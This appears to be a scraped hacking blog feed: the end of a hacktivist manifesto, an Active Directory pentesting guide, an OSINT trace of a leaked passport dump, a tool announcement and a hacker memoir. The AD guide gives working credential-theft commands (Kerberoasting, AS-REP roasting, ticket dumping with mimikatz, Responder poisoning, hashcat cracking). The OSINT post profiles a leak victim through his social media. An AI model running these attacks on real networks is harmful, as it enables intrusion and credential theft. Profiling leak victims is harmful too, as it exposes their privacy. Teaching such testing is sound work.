You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It's not selling hacking tools that makes Gamma evil. It's who their
customers are targeting and with what purpose that makes them evil. That's not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it's cheaper to attack than to defend it's harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!


--[ 00 ]-- Archive Notes

Original Source: https://pastebin.com/cRYvK4jb

Please contact me if you have a better version.

2019 Dec

]]>
Most common Active Directory vulnerabilities for pentesters https://hack4living.com/1337/12/18/most-common-active-directory-vulnerabilities-for-pentesters/ Wed, 18 Dec 1337 12:41:25 +0000 https://hack4living.com/?p=115 Today, many organizations and businesses globally rely on Active Directory as a central management solution for overseeing their resources. However, like any sophisticated technology, Active Directory is inherently complex, and securing it demands substantial effort and extensive experience.

This article offers practical guidance on conducting penetration tests in Active Directory environments. It includes a list of the most prevalent AD vulnerabilities and common misconfigurations to look out for.

Introduction

The following information is designed to assist penetration testers and auditors in identifying common security issues associated with administering Active Directory environments.

It provides practical steps on how to detect each vulnerability from a penetration tester’s perspective, utilizing standard offensive toolkits and readily available tools.

For every vulnerability you discover, you will earn a new piece of the hacking wall.

0. Users having rights to add computers to domain

In a default Active Directory installation, any domain user has the ability to add workstations to the domain. This is controlled by the ms-DS-MachineAccountQuota attribute, which is set to 10 by default.

This setting permits any low-privileged domain user to join up to 10 computers to the domain. While this might not seem problematic at first glance, it poses significant security risks:

  • Unmanaged Devices: Users can add their own, unmanaged computers to the corporate domain.
  • No Security Controls: These devices will not have corporate Antivirus or Endpoint Detection and Response (EDR) solutions installed.
  • Lack of Policies: Corporate Group Policy Objects (GPOs) and other security policies will not be applied to these systems.
  • Administrative Rights: Users will have administrative rights on these personal devices, granting them significant control and potential for misuse.

In corporate environments, users should never have local administrative privileges on their machines. This is a fundamental security control that should be applied universally.

When users have administrative privileges, they can carry out privileged operations on the network, such as crafting raw network packets, performing network scans, and running exploits to attack other systems. These capabilities pose significant security risks.

How to check

We can use Netexectool or NetWrappertool with this commands :

nxc ldap <ip> -u user -p pass -M maq
OR
netwrapper ldap <ip> -u user -p pass -M maq
Check If vulnerable commands

How to Add machines

The easiest way to test this is by using a Windows test machine, either physical or virtual, connected to the target corporate network to ensure it can reach the domain controllers.

In the the new machine, open powershell and use this command.

add-computer –domainname <FQDN-DOMAIN> -Credential <DOMAIN>\<USER> -restart –force
Example :
add-computer –domainname HxH.local -Credential hxh\hanzo -restart –force
Add machine to domain command

After restarting the test machine, it should be fully joined to the domain. This will allow you to confirm that the machine has successfully integrated into the corporate network as a domain member, enabling further testing and analysis.

Now, we can verify that our computer has indeed been added to the domain by listing the domain computers. This can be done using tools such as the Active Directory Users and Computers (ADUC) console or command-line utilities like net group or dsquery. This step ensures that the machine is recognized as a domain member within the corporate network.

0

1. Weak Kerberos Delegation (Unconstrained Delegation)

What is it?

In Active Directory, Kerberos delegation allows a service to impersonate users to access other services on their behalf. By default,some servers are configured withUnconstrained Delegation,”meaning they can impersonate ANY user, including high-privileged accounts like Domain Admins.

This means that if an attacker compromises a machine with unconstrained delegation, they can steal Kerberos tickets (TGTs) and use them to escalate privileges and move laterally in the network.

Why is it dangerous?

  • Credential Theft: Attackers can extract Kerberos tickets and use them to impersonate users.
  • Privilege Escalation: If a Domain Controller (DC) has unconstrained delegation enabled, an attacker could take over the entire domain.
  • Lateral Movement: An attacker can use stolen tickets to move between different machines without needing passwords.

How to check

We can use PowerShell or tools like PowerView to check for computers with unconstrained delegation.

Using PowerShell :

Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
This command lists all machines that have unconstrained delegation enabled.

Using PowerView :

Get-DomainComputer -Unconstrained

How to exploit it ?

If we compromise a machine with unconstrained delegation, we can steal TGTs(Kerberos Tickets) from any user that logs into it.

Step 1 : Steal Tickets

If you have SYSTEM access on a vulnerable machine, run:

Rubeus dump
or
mimikatz “privilege::debug” “sekurlsa::tickets /export”

This will extract TGTs that we can use to impersonate other users.

Step 2 : Use the Ticket to Impersonate a User

Rubeus ptt /ticket:TGT_Administrator@DOMAIN.kirbi
or
mimikatz “kerberos::ptt TGT_Administrator@DOMAIN.kirbi”

Now, you are logged in as the admin without knowing the password!

1

2. Kerberoasting – Stealing Service Account Passwords

What is it?

Kerberoasting is an attack that targets service accounts in Active Directory. These accounts are linked to SPNs (Service Principal Names) and can have weak passwords.

Attackers can request a Kerberos Ticket (TGS) for a service and crack it offline to recover the plaintext password of the service account.

The scary part? No need for admin privileges – ANY domain user can do it!

Why is it dangerous?

  • No Need for Admin Access – Any domain user can request service tickets.
  • Offline Cracking – Once an attacker gets the ticket, it can be cracked offline, making detection harder.
  • Privilege Escalation – Many service accounts have high privileges, sometimes even Domain Admin!

How to Check if a Domain is Vulnerable?

We need to list service accounts that are Kerberoastable.

PowerShell :
Get-ADUser -Filter {ServicePrincipalName -ne “$null”} -Properties ServicePrincipalName

This command shows all user accounts linked to a service (SPN) – these are the targets for Kerberoasting.

Get-DomainUser -SPN

How to Exploit it?

If we have a normal user account in the domain, we can request a service ticket and crack it offline.

Step 1: Request Service Tickets

Using Rubeus:

Rubeus kerberoast /format:hashcat

or

PowerShell:

Request-SPNTicket -UserName -Format Hashcat

This gives us a hashed password (TGS-REP hash).

Step 2 : Crack the Hash Offline

Now, use Hashcat to brute-force the password:

hashcat -m 13100 service_ticket_hash.txt rockyou.txt –force

If the password is weak, we now have access to the service account!

2

3. AS-REP Roasting – Cracking Passwords Without Even Logging In!

What is it ?

AS-REP Roasting is an Active Directory attack that allows attackers to steal password hashes for accounts that have Do not require Kerberos pre-authentication enabled.

Why ?


Normally, when a user tries to authenticate with Kerberos, the KDC (Key Distribution Center) asks for a timestamp encrypted with the user’s password (Pre-Authentication).

👉 But if Pre-Auth is disabled, the KDC just hands over an encrypted ticket (AS-REP) when asked.
👀 The problem? That ticket is encrypted using the user’s NTLM hash → We can brute-force it offline!

Why is it dangerous?

  • No Need for Domain Access – Even an external attacker can exploit it if they have a valid username list.
  • No Login Required – The target doesn’t need to be online; we just request an AS-REP from the domain controller.
  • Offline Cracking – Once we have the hash, we brute-force it without alerting the system.

How to Check if a Domain is Vulnerable?

We need to list accounts that have Pre-Auth disabled.

Using PowerShell :
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth

If this returns users, the domain is vulnerable!

Using BloodHound/PowerView:
Get-DomainUser -PreAuthNotRequired

How to Exploit it?

Step 1: Request an AS-REP Hash

If an account has Pre-Auth disabled, we can request an AS-REP hash.

Using Impacket’s GetNPUsers:

python3 GetNPUsers.py pentest.local/ -usersfile users.txt -dc-ip 10.10.10.1

Example Output (Stolen Hash) :

$krb5asrep$23$john@PENTEST.LOCAL:248cd3d7c0bcd57dc6712c07c3a731bc


This is the password hash we need to crack!

Step 2: Crack the Hash

Now, let’s brute-force the password using Hashcat.

hashcat -m 18200 asrep_hash.txt rockyou.txt –force


Example Cracked Password Result:

$krb5asrep$23$john@PENTEST.LOCAL:248cd3d7c0bcd57dc6712c07c3a731bc
 →Password123

Boom! We cracked the password!
Now we can log in as John and escalate further.

3

4. LLMNR & NBT-NS Poisoning – Catching NTLM Hashes Like PokĂ©mon!

What is it?

In Windows networks, when a machine can’t resolve a name using DNS, it falls back to other name resolution methods like:

  • LLMNR (Link-Local Multicast Name Resolution)
  • NBT-NS (NetBIOS Name Service)
  • mDNS (Multicast DNS)
  • WPAD (Web Proxy Auto-Discovery)

⚠ These are legacy protocols and they’re often enabled by default.

👀 The problem? If an attacker is on the same network, they can pretend to be the machine you’re looking for — and the victim automatically sends you their NTLM hash.

Why is it dangerous?

  1. Users leak credentials without doing anything — just opening Word or mistyping a file path can trigger it.
  2. You get NTLMv2 hashes — which can be cracked offline.
  3. Combined with NTLM Relay, this becomes a domain takeover machine.

💣 Real-life Example

Imagine a user tries to open:

\filesrver\share

(typo: should be fileserver)

💡 Their machine thinks, “Hmm
 DNS didn’t resolve this, let’s ask the LAN.”

You’re on the LAN with Responder running →
You yell: “Hey! I’m filesrver!”
They believe you and send their NTLMv2 hash

How to Exploit It ?

Step 1 : Run Responder

responder -I eth0 -rdwv

✅ Flags:

  • -r: Respond to NetBIOS name queries
  • -d: Respond to LLMNR
  • -w: WPAD capture
  • -v: Verbose mode

📩 You’ll see something like:

[LLMNR] Received Name Query for FILESRVER
[SMB] NTLMv2-SSP Client: WIN10-PC
[SMB] Username: DOMAIN\johndoe
[SMB] Hash captured:
$NETNTLMv2$DOMAIN\johndoe::1122334455667788:5566778899AABBCC


đŸ’Ÿ The hash is saved in:

/usr/share/responder/logs/

Step 2 : Crack the Hash Offline

Now, use Hashcatto crack it:

hashcat -m 5600 captured_hash.txt rockyou.txt –force

đŸ’„ Example cracked result:

$NETNTLMv2$DOMAIN\johndoe::
 → Password123!

You now have valid domain creds. Game on.

4

More vulns soon!

]]>
Global Passport Leak : An OSINT Investigation https://hack4living.com/1337/06/16/global-passport-leak-an-osint-investigation/ Sun, 16 Jun 1337 11:49:29 +0000 https://hack4living.com/?p=70 Scrolling through my LinkedIn feed again and I saw this!

So what is this about? Is this real?

To start my investigation, I needed to find the source where this leak was posted. Since the image is familiar and clearly looks like it’s from breached forums, I remembered that Breached has gone through many issues lately. All the Breached forums were seized by the FBI, but there is still one alive: https://breachforums.st

As expected, the leak was from there, and I was able to download a demo of the leaked data!

Based on these samples, I can confirm that the leak is genuine. There are many passports of individuals from different countries, including:
Israel
– Saudi arabia
– Morocco
– Libya
– Iran
– Sweden
– Canda

And more …

Now, the big question is: which organization has been hacked? And from which country exactly? Is this from multiple organizations or only one?

I had many theories in mind!
Basically, in every country, there are a few organizations that can store people’s passports, such as visa providers and airports!

Possible Scenarios :

  • Visa providers are using a common framework which attackers found a zero-day vulnerability to exploit, leading to mass attacks on multiple providers in different countries.
  • Airports are using a common framework which attackers found a zero-day vulnerability to exploit, and they used it against multiple airports in different countries.

Before digging into one of these unconfirmed scenarios, I decided to take a deep look at the sample and I found something interesting!

If we recheck the samples carefully, we will see that most of them look like example number 1, but there’s one ‘example number 2‘ that has something special! It’s a boarding card!

For poor hackers like me who never had the opportunity to travel on a plane, a boarding card is the paper that confirms you paid for the trip to travel on a specific plane. This paper is only provided to you to present to the staff at the airport, so they let you into the waiting area for your flight!

Sometimes the staff scans your passport and they also scan this paper, which is the case here! All these details can confirm that this leak is coming from an airport, and it’s likely just one single airport.

Till now, nothing is 100% confirmed, so let’s dig more.

If we focus on the boarding document, we can see some words written in Turkish. There’s also a date, 21-2-2022, and a website: www.umur.com.tr

This means that this boarding paper is from a Turkish airline. Searching the internet for this word: ‘Biniß Kartı‘ we found this:

This confirms exactly that this person has traveled with this Turkish airline.

Now, what about this website: www.umur.com.tr ?

A little search gave me the idea that this is a company that provides thermal papers that can be used in payment machines.

I’m not sure about the relation between this company and our investigation, but having the signature of a Turkish thermal paper provider on a boarding card can only be used by Turkish airlines. There’s no way another country, like the USA or France, would use this provider instead of their local providers!

Back to our main investigation, let’s focus on the person with the boarding card. Since we have his full name and we know he is originally from Israel, I decided to do some OSINT on him!

As you know, nothing is better than social media to learn about people’s lifestyles.

The person with the passport and the boarding card did indeed travel to Turkey in 2022, and he shared this picture on his Instagram profile.

Since the date on this picture is June 10, 2022, and the one on the boarding card is 21.2.2022, we can assume that this person bought his ticket 5 months before the trip! If we look at his birthday, we can see it’s in June, so maybe he wanted to spend his birthday in Turkey.

Another proof that this leak comes from an airport in Turkey is this picture of another person from Palestine, but with a paper containing Turkish words.

At this moment, we are sure that this leak is coming from a Turkish airport, but unfortunately, we aren’t able to determine exactly which one. Honestly, I don’t want to dig more :’)

To the curious people who may ask who is behind this leak, this could be a subject for another investigation. From what we have now, there is a small indicator that the threat actor is from Russia. You can see the little words in one of the pictures he provided: ‘Đ’Ń‹ĐŽĐ”Đ»Đ”ĐœĐŸ 1.000 ĐŸĐ±ŃŠĐ”ĐșŃ‚ĐŸĐČ (872,9 МБ)‘ which means ‘1,000 items selected (872.9 MB)‘.

As I always say, this is not something you should believe as 100% confirmed. This was only a simple investigation done out of curiosity, using free resources and without touching any organization’s assets.

Special thanks to ZeroMemoryEx, 0xPwny, and C3poDay.

]]>
NetWrapper Tool https://hack4living.com/1337/06/10/netwrapper-tool/ Mon, 10 Jun 1337 23:37:25 +0000 https://hack4living.com/?p=65 NetWrapper is a powerful shell script designed to enhance the capabilities of the netexec tool by generating detailed HTML reports. Simplify your network execution tasks and visualize the results with style and clarity.

SMB Shares Enumeration

Kerberoasting Demo

Features

  • Easy to Use: Simply wrap your existing netexec commands with NetWrapper to create beautiful HTML reports.
  • HTML Report Generation: Automatically generates a well-structured HTML report of netexec output.
  • Visual Enhancements: Highlights important details and protocols (e.g., SMB, LDAP, FTP, SSH) with colored and icon-based indicators for quick analysis.
  • Custom Styling: Incorporates Bootstrap for a responsive and clean design, with custom CSS for enhanced readability.

How It Works

  1. Run Your Commands: Use NetWrapper to execute your netexec commands.
  2. Generate Reports: NetWrapper captures the output and converts it into an HTML report.
  3. Visualize: Open the generated report in your favorite browser to explore the results.

Installation

Make sure you have netexec installed and available in your system’s PATH. Then, simply download the NetWrapper script:

git clone https://github.com/Edd13Mora/NetWrapper.git
cd NetWrapper
chmod +x net.sh

Enjoy.

]]>
Hack4living Book https://hack4living.com/1337/06/09/hack4living-book/ Sun, 09 Jun 1337 02:03:04 +0000 https://hack4living.com/?p=40 Stylish Hacking Storybook

Intro :

lets go!

This book is dedicated to you, all of you, all of you people sitting in front of your screens playing piano symphonies with your keyboards creating amazing malware and reversing stupid company codes, this is for you and me, for real hackers and also fake ones, for my mother for all the mothers that have no idea what their kids are doing alone in their dark rooms at 3 Am.

I am writing this book with tears in my eyes, and hunger in my stomach but with a strong belief that I’m not alone and some people will receive the right feeling from these words I’m writing.

In this piece of paper, I’m willing to tell you about my journey as a hacker, how I gave my soul to hacking and never wanted it back till I left this earth with my laptop in my hands.

If there is only one thing I want you to understand after reading all of this, it is that hacking is a lifestyle, with nothing to do with computers or any black screens with green random strings.

There is no single correct or perfect way to read this book. True hacking is about finding your own unique way to do things differently from others. Once you find your path, connect with those who have taken the same approach and collaborate. Be sure to play the songs listed in each chapter as you read, these are the same tracks I listened to while writing this bible.

Remember, this is not just a book; it’s a ticket to a journey unlike any you’ve experienced before.

You’ll discover a new world, my world. Dive into the deep, dark side of a hacker’s life, exploring the music I cherish, the mangas I love, and the films that inspire me.

Get ready, fasten your seatbelt, and let’s go!

Chapter 1: The Beginning

2008 is the only year I can vividly recall from my childhood. I was a kid with no responsibilities, going to school every day in a poor neighborhood where everyone aspired to be a football player. To me, it seemed like a foolish dream. I was different, built differently. I had no friends except for my father, the only person with whom I could have meaningful discussions, take walks, and talk about science and complex theories.

Honestly, I didn’t like school. Even the schoolbag felt heavy. The conditions were terrible, like a cage where you spent the whole day, only to return home at 6 PM.

At this time, technology was something new and expensive. By technology, I mean gaming consoles. I was 11 and had nothing, not even a cellphone so I had no connection to the outside world. My dad encouraged me to start boxing, and I accepted, thinking at least I’d learn how to fight since I had nothing else to occupy my time.

That same year, a good friend of my dad gifted me a PlayStation 1. Dude, it was 2008, and this console came out in 1994, but to me, it seemed like something from the future! We had one TV at home, an old, bulky one, but I figured out how to plug in the PS1. I had one amazing game, Crash Bandicoot, which I spent all my time playing. I was the only happy person at home, though my family wasn’t thrilled because I monopolized the TV 24/7. Sorry, Mom and Dad.

At that moment, I discovered something new in this world, gaming devices! Unfortunately, I had no friends to invite and share my excitement with, but it was okay. I spent days playing and enjoying myself until something weird and sad happened. The PS1 stopped working. It wouldn’t read the game, kept loading, and displayed error messages.

Boxing

Back to normal life: school, sports, home, eating, watching TV, and sleeping. Day after day, I started making some friends. One of them told me about something called an Internet café, where you could pay to play game consoles for a certain time.

What? Internet café! What is this place? Could someone have many PS1s and rent them out? What about games? Were there other games besides the one I used to play? These questions swirled in my mind. After school, I went with this friend to see the place. It was crowded with people of all ages. I was really amazed!

The place had two floors. The first floor was less crowded and had some weird machines I’d never seen before. they looked like TVs, but I wasn’t sure. We went to the second floor, and I was in for a big shock! Many people were in front of TV screens, playing various games together with different controllers. I was so happy watching them. Then I noticed something, the console they were using was different from mine. It looked fancier and was black, while mine was basic gray. I was too shy to ask about it, so I just observed. I saw “PlayStation 2” written on one of them.

OMG! So this device comes in different types!

PS1

In fact, my first experience with gaming wasn’t with the PS1. I had used arcade machines before, inserting coins to play Street Fighter. However, the places where these arcade machines existed weren’t friendly for a kid, and my parents forbade me from going there.

I tried many times to visit these places secretly to play, but there were other people, scammers who wouldn’t allow you to play alone. They wanted to play 1 vs. 1 games and were very skilled since they spent a lot of time playing. They would challenge you, you would lose, and they would keep challenging others. If you were a good player, you could play all day for free by challenging and winning against others.

PS1

Back to that cyber cafĂ© vibe, it was heaven on earth for me. There were so many games: Metal Slug, GTA, PES, God of War, Prince of Persia, Need for Speed and super talented people playing and enjoying them. Unfortunately, it wasn’t free.

I always believed that being poor is a default setting, but you can always try to play with these settings and hack them. That’s what I did. I tried to go back to that place every time, even without playing, so people would recognize me. I kept watching them play and learned from them. Sometimes, I would pay to play for 30 minutes or an hour max because I didn’t have the budget.

The hack was to learn as much as possible, get to know everyone, become a PS2 master, and then wait for players who were stuck on a mission or a level and needed help. Here came my services, I would take control and help them bypass the mission. It was a win-win situation: they were happy, and I enjoyed playing for free!

As I mentioned before, I didn’t have a phone. You may ask, why would I need a phone? Normal people might have answers like calling friends or listening to MP3 songs, but my vision was different. As a kid, I used to take my dad’s phone and play a game called Space Impact on his Nokia 3310. This game was amazing, taking me to another world with many bosses and missions to accomplish. Having a phone was the best way to play this game or even other games, so I could always have a device in my pocket to help me spend the large amount of free time I had.

I had a cousin, the same age as me, who used to visit us with his parents. Since parents loved to have serious discussions, two kids in the same place were a big source of noise. So, our fathers gave us their phones to keep us quiet and occupied.

My uncle’s phone was really different from the Nokia I had in my hand! It had a bigger screen with colors! The big surprise was that his phone had a different type of games, with more beautiful designs, amazing characters, fights, and weapons.

What I really remember is that every time I saw a phone, I would try to check if it had a mini logo of a coffee cup and the word “Java” written on it. This was because those games on my uncle’s phone always loaded this logo on the start screen. I didn’t have enough knowledge about what Java was, but I was happy that it existed.

PS1

Days and weeks passed. I was getting older and smarter, learning more details about games and the Sony company. Do you remember that cyber café I talked about before? I discovered that there were many of them in the city. They had some differences, but there was always that first floor with those weird machines. I started getting interested in knowing what they were!

These machines looked like fat TVs but had a big board with many buttons and something like a soap linked with a cable! What attracted me was that the people using these devices looked different—older than the PlayStation players, less excited, less noisy, and they were always alone using the machine.

I often tried stalking them. Sometimes I saw them watching videos, playing some kind of games, or even reading messages! One day, I heard someone talking with someone else, like on the phone, but they could see the other person on the screen! I thought, what the heck is this?

At this time, I became more curious and sociable, so I had the courage to ask people about things. One belief I held firmly was that if you want to know something, try to ask the sources, not just the normal people using the source!

The source, in this case, was the person who owned that cyber cafĂ©. He always respected me as a kid because I was different—quiet, polite, and never got into fights with others. This might have been because of my nature or maybe because I was the poor guy in the area, looking for acceptance without paying a cent so I could learn and enjoy my time in silence haha!

I went to the owner but was still hesitating about what to ask, lost in a cloud of ideas trying to find the best question. He asked me directly, “Do you want something, kid?” I was stunned and unconsciously pointed to one of the machines, asking, “What is this?”

The man was so kind. His face lit up with a big smile after hearing my question. He said, “Have you ever heard of something called a computer or the internet?” I replied, “Computer, no, but internet, yes. I’ve heard people on the second floor talking about it, how they find game solutions there, but honestly, I have no deep knowledge of that.”

He took a chair and invited me to sit with him in front of one of the machines. He said, “These machines aren’t ordinary; they are the future. These machines are called computers, and by knowing how to use them, you can access a wealth of information and communicate with people on the other side of the world. You can watch your favorite films without waiting for them to appear randomly on TV, play games, read about anything you like, and learn it. And of course, you can connect with other people who also have computers. You and they, and every machine like this, can be connected through what we call the internet, and it’s not free, haha.”

I directly asked, “What about this weird soap and this huge number of buttons with letters? They look like phone buttons but bigger!”

He said, “This is what we call a keyboard. It’s the way you communicate with the computer. You ask it questions, and it answers. Since the screen is bigger than a phone and there are many features you can access, there’s no way to move around with buttons alone, so that’s why we have the mouse—or as you said, a soap, haha!”

A mouse! Haha, well, at that moment, I really started seing it as a mouse, not a soap, anymore!

That short moment with that person was the beginning of a big butterfly effect. For those who love mangas, if you have read Hunter x Hunter, it’s like that moment when Gon meets his father, Ging, for the first time, and Ging tells him that the world we are living in is only 1% of the real world that exists. That’s exactly how I felt that day.

HxH

As you might expect, I couldn’t sleep that night. I started imagining what I could access if I had a computer and knew how to use it! Not having money was normal, but having knowledge was something extraordinary! I spent the next weeks trying to talk to my cousin and friends about this computer thing. I even talked to my father about it. Since my father is from an older generation, he said, “Yes, I know that computers exist, and many people know about them. But they are for higher education and scientific purposes, and they are expensive. You also need to be very smart to be able to use these devices.”

PS1

Honestly, this discouraged me me, but of course, nothing could stop me from dreaming! I kept going back to the cyber café whenever I could, but this time, I focused on the first floor and tried to forget about the PlayStation area. I tried to build relationships with people who used the computers often so I could ask questions from time to time and so they would let me see what they were doing without feeling stalked!

One thing I forgot to mention is that there were big wooden boards between each computer, like dividers, so no one could see what others were doing. At a certain point, I discovered that these machines weren’t only for high-IQ people and highly educated individuals but also for people who wanted to watch porn, lol. Many people were hiding between the wooden boards, secretly watching porn videos. I was surprised, not because of what they were watching, but because they were spending money I didn’t have to watch this, instead of doing research, creating something, or anything special!

It felt weird, wondering if I would be able to touch the keyboard again after one of those people had jerked off on it, hahaha!

Anyway, days passed, summer came, and I had more free time. I wanted to use this free time to learn more about the internet and computers, but life had different plans. The cyber cafĂ© closed for vacation, and the customers went off to enjoy swimming somewhere! As for me, there was no such thing as a vacation—vacation was just staying home. But at least I had my cousin; we played outside and walked around the city with no objectives, just killing time.

I kept waiting for school to start again because I had some great news from my cousin. He said that this year we would have IT as a subject, and they would teach us about computers and how to use them. OMG, is this real? I would learn and touch computers for free! I was ready to stay at school 24/7.

School started, and all my excitement and expectations were wrong. It’s true we had IT as a subject, but only once every two weeks for two hours. I wanted more, but there were no other options. The first day of IT class came, and I was so excited. The classroom was full of computers like the cyber cafĂ©, but without the wooden dividers this time, hahaha!

The teacher was young and kind. He started telling us about the history of computers and their components. It was theory-based, but I was enjoying it. During the course, I noticed something—many students seemed advanced; they knew more than me. They even discussed various details with the teacher that I didn’t know about.

It was okay until the moment the teacher said, “Since you are already familiar with computers and know how to use them, we will jump directly to learning how to use Microsoft Office.” Believe me, I felt so sad and depressed. How do these kids know about this? The teacher would skip the basics because they showed him that they already knew things that I, and maybe other kids, had never seen before.

The lesson ended, and I learned nothing because everything was too advanced. I felt like a stupid clown who wasn’t interested in this field, even though inside I was sure I was the most interested one. I went back home with sadness, unable to explain what was wrong to anyone because it would seem stupid. But it was something—those kids had big brothers and computers at home, giving them easy access to information.

I was alone. I had a little sister, but I didn’t even have a phone. Man, I cried…

PS1

Chapter 2: The Spark

Like every kid in this world, I got sad about many things — but I forgot them quickly. What I never forgot, though, was the deep feeling I had to master this computer thing. I became like a hungry wolf. Every time I was at school or out playing on weekends, if I heard someone had a personal computer at home, I’d do everything I could to become their best friend. I’d push them to invite me over and show me the computer. I was doing social engineering fifteen years ago before I even knew what it was — haha.

Sure, I got invited sometimes, but it was never enough. Only a few friends had computers, and of course, none of them were as interested as I was. They always preferred playing outside. But just by seeing those machines and touching them a little, I started memorizing names and logos — Microsoft, Skype, MSN, Caramail, and more. I had no idea what any of it meant, but I knew I wanted to understand it all.

So theoretically, there wasn’t a direct way to own a computer or learn how it worked quickly — unless I discovered some glitch in the matrix or waited until computers became something normal and cheap so everyone could have one.

Days passed, and I noticed something important. Around that time, many people were leaving the country to study or work abroad. They called their families from time to time, but it was never enough — they needed to see each other. The question was: why not? Why weren’t they using something on the computer to do that? Didn’t the guy who owned the cyber cafĂ© say they were all connected? I’d even seen people watching and talking to each other on screen before…

The answer was yes — it was possible. It existed. And many people knew about it and used it. It was through that program I mentioned earlier: Skype.

But before I tell you how I figured that out, let’s go back a few weeks. I found out that one of my cousins, who lived a little far from us, was going with his older brother to a cyber cafĂ© in their neighborhood. They already knew how to use the computer. They went there to chat with friends and also to play a game called Dofus.

As you might expect, it was obvious I’d start visiting those cousins more often — staying with them as much as I could, being extra kind just so they’d accept me and include me in everything… especially when they went to the cyber cafĂ©. One day, they asked me: “Do you wanna go with us to the cyber cafĂ©?” I said yes without even thinking. Of course, they assumed I already knew how to use a computer — and of course, I would’ve said yes no matter what they asked me to do, haha.

I didn’t have any money to go with them. But neither did they. I’d always loved these cousins, and thankfully, their parents were the type who — when they gave something to their kids — gave me the same too. So they gave us some money to split and enjoy together.

Money in the pocket, smile on my face, confident walk with my two cousins like real gangsters. But deep inside? I was terrified. What the hell do I do with the computer once I’m there?

We arrived at the cyber cafĂ©. It was crowded — not even a single empty seat. We had to wait until someone finished so we could take their spot. After about fifteen minutes, a woman got up, and my cousins told me to go take her place — they would wait for other seats to open. They were kind, and they wanted me to start having fun. But… it was the worst part of that day.

When I sat down, the computer was still on after the woman left. That was a relief, at least I wouldn’t have to figure out how to turn it on — hahaha. I started moving the mouse around, hovering over random icons, clicking stuff… but I had no clue what I was doing or what I should be doing.

My cousins were behind me, watching me waste time doing nothing. They said, “You’re wasting minutes! Play something!” One of them pointed at a card game icon on the desktop. I clicked it, but a small menu appeared. “No,” he said, “don’t use right-click — use the left one!” Oof… okay. I did it, and the game opened.

Using just the arrow keys and spacebar, I was able to play.

Everything was great for a couple of minutes. I was playing the game, and a bunch of other kids who were still waiting for their turn were watching me. It felt good. For a moment, I felt like I was the master — finally in control.

Then suddenly
 I misclicked something. The screen went black. Some white text appeared on the screen — like something out of a hacker movie. My heart dropped. I started randomly hitting buttons on the keyboard, hoping I could somehow bring the game back. But things only got worse. More error messages started popping up, and then


The Blue Screen.

PS1

I was shocked. Frozen. I had no idea what I did — and no idea how to fix it. My cousins were far away, busy with their own screens, probably deep in Dofus.

I felt weird, embarrassed, scared
 like I broke the holy machine or triggered something forbidden. So I did the only thing I could think of. I got up, pretended I was going to the bathroom


And never came back. I went straight home.

I carried that guilt for days. I kept avoiding meeting or visiting those cousins. I was scared — scared that the cyber cafĂ© owner might have told them what happened, scared that I had broken the computer. I didn’t want to face the truth.

Then one day, my cousins came to visit us. They asked, “Why don’t you come anymore?” They told me they missed me. That’s when I realized… they knew nothing about what happened. Or maybe I hadn’t done anything bad after all — maybe I was just panicking. So I told them I had been sick, and that I’d come visit them again soon.

And that’s exactly what I did. I started visiting them again. We went to the cyber cafĂ© more and more. Little by little, I started learning. I found out that Skype was a program people used to video call others in different countries. MSN too, but more for text chatting — no video.

PS1

Did I learn how to actually use the computer? Well… no, not really. It wasn’t that easy. And if you’re wondering why — it’s because almost everything on the screen was in French. And back then, I didn’t understand French well at all.

Summer ended. School started. Was I excited for IT classes? Yes. But I was even more excited for… French classes.

I had made a decision: Start with the basics. Why not learn French first, get familiar with it, and then dive back into computers? At least then I’d be able to understand those error messages and popups — lol.

That was my plan for the whole year. I focused on school, watched French TV channels, picked up random books, and tried to absorb any French word I could — especially technical ones. But in the end… I learned nothing. My French was barely more than just saying Bonjour. I was trying to achieve big things using random techniques, with no real structure or plan.

By now, years had passed since I first discovered “this computer thing,” but I still wasn’t really using one. Computers had become more common though — I started seeing them in public places, and I even discovered a new type called laptops — a mobile version of a computer you could carry with you. Of course, just because computers existed didn’t mean people could afford them. The price was still a big problem.

But things were shifting. Even schools started asking us to do research using the internet. Not directly, of course. They weren’t handing us laptops or anything. We had to go to the cyber cafĂ©, pay the owner, and he’d find the information online, print it out for us, and that’s what we’d bring to school — a paper we’d read like we did the work ourselves.

Families started realizing that the internet was becoming a big deal — especially for education. So many of them decided to buy a home computer. And guess what?

My father did too.

PS1

I couldn’t believe it. One day, he brought home a fat, white desktop computer — just like the ones from the cyber cafĂ©. I was shocked. And insanely happy.

He even brought a technician to set it up in our room — mine and my little sister’s. She was still very young, but so happy for me. I had been telling her stories about computers like they were magic boxes — something that could take her to Narnia or another universe.

My father already spoke French, so even though he didn’t really know how to use a computer, he could survive just by reading instructions, button labels, and the messages that popped up. I didn’t have that luxury. So, he invited a young man to help — someone I had seen around the neighborhood before, but never really knew personally. This person would later become very important in my story, so let’s give him a name right now: YC — so we can recognize him when he comes up again later.

YC was in his twenties, and he already had a personal computer at home. He knew a lot about how it worked. He came to our place and showed me the basics — how to turn the desktop on and off, how to navigate, and even how to find the things already stored on it. I discovered that I had access to films, videos, and a few games I could play.

For once, I actually understood what someone explained. I was so damn happy. I could finally turn the machine on by myself. I could play Super Mario, and two other games I can’t even remember the names of now. But more importantly, I watched my first movie ever on that machine. It was called Halloween, and it was already saved locally on the hard drive.

My little sister was happy too. She played with me. It felt like a moment of magic finally becoming real.

PS1

Chapter 3: Soon…

Soon…

Chapter 4: Soon…

Soon…

]]>